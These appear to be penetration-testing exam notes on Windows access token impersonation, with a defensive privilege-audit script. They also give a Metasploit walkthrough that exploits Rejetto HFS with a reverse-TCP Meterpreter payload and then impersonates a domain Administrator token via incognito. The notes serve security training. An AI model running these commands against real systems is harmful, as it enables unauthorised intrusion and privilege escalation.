# Access Token Impersonation

## Windows Access Tokens

* Windows access tokens are a core element of the authentication process on Windows and are created and managed by the **Local Security Authority Subsystem Service (LSASS)**.
* A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookie that provides users with access to a system or network resource without having to provide credentials each time a process is started or a system resource is accessed.
* Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and include the identity and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by the user inherit a copy of the access token from their creator and run under the privileges of that same token.
* Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.
* An access token will typically be assigned one of the following security levels:
  * Impersonate-level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons.
  * Delegate-level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols such as RDP.
* Impersonate-level tokens can be used to impersonate a token on the local system and not on any external systems that utilize the token.
* Delegate-level tokens pose the largest threat as they can be used to impersonate tokens on any system.

## Windows Privileges

* The process of impersonating access tokens to elevate privileges on a system will primarily depend on the **privileges assigned** to the account that has been exploited to gain initial access, as well as on the impersonation or delegation tokens available.
* The following are the privileges that are required for a successful impersonation attack:
  * `SeAssignPrimaryToken`: This allows a user to impersonate tokens.
  * `SeCreateToken`: This allows a user to create an arbitrary token with administrative privileges.
  * `SeImpersonatePrivilege`: This allows a user to create a process under the security context of another user, typically with administrative privileges.
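As an added example (not part of the original notes), the following Python audits `whoami /priv`-style output for the three privileges listed above, which is what a defender checks on service accounts before an attacker runs `getprivs`. The sample output is constructed; the privilege names are the full forms Windows reports (`SeAssignPrimaryTokenPrivilege`, `SeCreateTokenPrivilege`, `SeImpersonatePrivilege`).

```python
import re

# The three privileges the notes above tie to token impersonation, using the
# full names that `whoami /priv` (and Meterpreter's getprivs) report for them.
IMPERSONATION_PRIVILEGES = {
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
    "SeCreateTokenPrivilege": "create an arbitrary token",
    "SeImpersonatePrivilege": "impersonate a client after authentication",
}
# Constructed sample of `whoami /priv` output for a service account (not real output).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""
# One table row: privilege name, free-text description, then the State column.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

def parse_privileges(text):
    """Return {privilege_name: state} parsed from `whoami /priv` style output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def impersonation_risk(text):
    """Report impersonation-related privileges on the token, split by state.

    A privilege shown as Disabled is still held by the token and can be
    enabled by the process itself, so the audit lists held ones separately.
    """
    privs = parse_privileges(text)
    held = sorted(p for p in privs if p in IMPERSONATION_PRIVILEGES)
    enabled = [p for p in held if privs[p] == "Enabled"]
    return {"held": held, "enabled": enabled}

if __name__ == "__main__":
    report = impersonation_risk(SAMPLE_WHOAMI_PRIV)
    for name in report["held"]:
        state = "ENABLED" if name in report["enabled"] else "disabled"
        print(f"{name:<32} {state:<9} can {IMPERSONATION_PRIVILEGES[name]}")
```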

## The Incognito Meterpreter Module

* **Incognito Meterpreter Module** is a built-in tool in Metasploit that was originally developed as a standalone application for token impersonation after a successful exploit.
* The **Incognito module** allows you to **display a list of available user tokens** that can be impersonated.
* It enables **token impersonation**, allowing you to assume different user identities and access elevated privileges on the compromised system.
* This module enhances **post-exploitation capabilities**, enabling deeper system access and facilitating the assessment of security risks by adopting various user tokens.

## Attack Flow for the Access Token Impersonation Attack

### 1. **Exploit Vulnerability**

* **Target**: HTTP Rejetto web server
* **Vulnerability**: Remote Code Execution (RCE)
* **Tool**: Metasploit Framework
* **Module**: `exploit/windows/http/rejetto_hfs_exec`
* **Action**: Use the `msfconsole` to launch the exploit and gain basic access to the server.
* **Command**:

  ```bash
  use exploit/windows/http/rejetto_hfs_exec
  set RHOSTS [Target IP]
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST [Your IP]
  exploit
  ```

### 2. **Check System Information**

* **Action**: Once you have a Meterpreter session, run the `sysinfo` command to gather system details.
* **Command**:

  ```bash
  sysinfo
  ```
* **Observation**: Confirm the system is 32-bit (x86) based on the output.

### 3. **Attempt to** [**Migrate to 64-bit Shell**](https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/system-host-based-attacks/windows-privilege-escalation/pages/xj7uLhDPRWqP8BUDk4SA#id-2.-transition-to-a-64-bit-x64-shell)

* **Issue**: You may encounter “Access is denied” if trying to migrate to a 64-bit shell because the current session is 32-bit.
* **Solution**: Use the **`incognito`** module to bypass this restriction instead.

### 4. **Check Privileges**

* **Action**: Execute the `getuid` command to check the current user.
* **Command**:

  ```bash
  getuid
  ```
* **Output**: Shows "LOCAL SERVICE" as the current user.
* **Next Step**: Run `getprivs` to list available privileges.
* **Command**:

  ```bash
  getprivs
  ```

### 5. **Leverage Privileges for Token Impersonation**

* **Privilege**: **`SeImpersonatePrivilege`** is available, allowing token impersonation.
* **Action**: Load the **`incognito`** module to use this privilege.
* **Command**:

  ```bash
  load incognito
  ```

### 6. **List Available Tokens**

* **Action**: Display user tokens to find a higher privilege token.
* **Command**:

  ```bash
  list_tokens -u
  ```

### 7. **Impersonate a Higher Privilege User**

* **Action**: Use the **`impersonate_token`** command to assume the identity of a higher privilege user.
* **Command**:

  ```bash
  impersonate_token "ATTACKDEFENSE\Administrator"
  ```

### 8. **Migrate to a 64-bit Shell**

* **Action**: After impersonation, migrate to a 64-bit (x64) shell.
* **Command**:

  ```bash
  migrate [x64 Process ID]
  ```

***

**Hacker's Mantra:** "Computer hackers do not need to know each other's real names, or even live on the same continent, to steal millions in mere hours." - Robert Mueller
